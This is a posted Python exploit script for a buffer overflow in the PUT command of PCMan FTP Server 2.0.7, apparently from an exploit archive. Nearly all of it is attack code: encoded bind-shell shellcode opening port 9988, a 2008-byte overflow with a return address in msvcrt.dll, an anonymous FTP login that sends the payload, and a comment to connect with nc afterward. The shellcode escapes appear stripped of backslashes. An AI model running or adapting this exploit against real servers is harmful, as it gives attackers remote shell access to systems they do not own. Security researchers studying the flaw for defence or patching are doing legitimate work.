PCMan FTP Server 2.0.7 PUT Buffer Overflow
Posted on 09 August 2015
#!/usr/bin/python # title: PCMan FTP Server v2.0.7 Buffer Overflow - PUT Command # author: @shipcod3 (Jay Turla) # nc <host> 9988 # Tested on Windows XP Service Pack 3 - English # description: Buffer overflow is triggered upon sending long string using the command PUT to PCMAN FTP 2.07 import socket import sys # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b 'x00x0Ax0D' -t c shellcode = ( "xdbxd0xbbx36xccx70x15xd9x74x24xf4x5ax33xc9xb1" "x56x83xc2x04x31x5ax14x03x5ax22x2ex85xe9xa2x27" "x66x12x32x58xeexf7x03x4ax94x7cx31x5axdexd1xb9" "x11xb2xc1x4ax57x1bxe5xfbxd2x7dxc8xfcxd2x41x86" "x3ex74x3exd5x12x56x7fx16x67x97xb8x4bx87xc5x11" "x07x35xfax16x55x85xfbxf8xd1xb5x83x7dx25x41x3e" "x7fx76xf9x35x37x6ex72x11xe8x8fx57x41xd4xc6xdc" "xb2xaexd8x34x8bx4fxebx78x40x6exc3x75x98xb6xe4" "x65xefxccx16x18xe8x16x64xc6x7dx8bxcex8dx26x6f" "xeex42xb0xe4xfcx2fxb6xa3xe0xaex1bxd8x1dx3bx9a" "x0fx94x7fxb9x8bxfcx24xa0x8ax58x8bxddxcdx05x74" "x78x85xa4x61xfaxc4xa0x46x31xf7x30xc0x42x84x02" "x4fxf9x02x2fx18x27xd4x50x33x9fx4axafxbbxe0x43" "x74xefxb0xfbx5dx8fx5axfcx62x5axccxacxccx34xad" "x1cxadxe4x45x77x22xdbx76x78xe8x6axb1xb6xc8x3f" "x56xbbxeex98xa2x32x08x8cxbax12x82x38x79x41x1b" "xdfx82xa3x37x48x15xfbx51x4ex1axfcx77xfdxb7x54" "x10x75xd4x60x01x8axf1xc0x48xb3x92x9bx24x76x02" "x9bx6cxe0xa7x0exebxf0xaex32xa4xa7xe7x85xbdx2d" "x1axbfx17x53xe7x59x5fxd7x3cx9ax5exd6xb1xa6x44" "xc8x0fx26xc1xbcxdfx71x9fx6axa6x2bx51xc4x70x87" "x3bx80x05xebxfbxd6x09x26x8ax36xbbx9fxcbx49x74" "x48xdcx32x68xe8x23xe9x28x18x6exb3x19xb1x37x26" "x18xdcxc7x9dx5fxd9x4bx17x20x1ex53x52x25x5axd3" "x8fx57xf3xb6xafxc4xf4x92") buffer = "x90" * 30 + shellcode #77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] evil = "A"*2008 + "x59x54xC3x77" + buffer + "C"*(888-len(buffer)) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((raw_input('Enter Host:'),21)) s.recv(1024) s.send('USER anonymous ') s.recv(1024) s.send('PASS anonymous ') s.recv(1024) s.send('PUT ' + evil + ' ') s.recv(1024) s.send('QUIT ') s.close
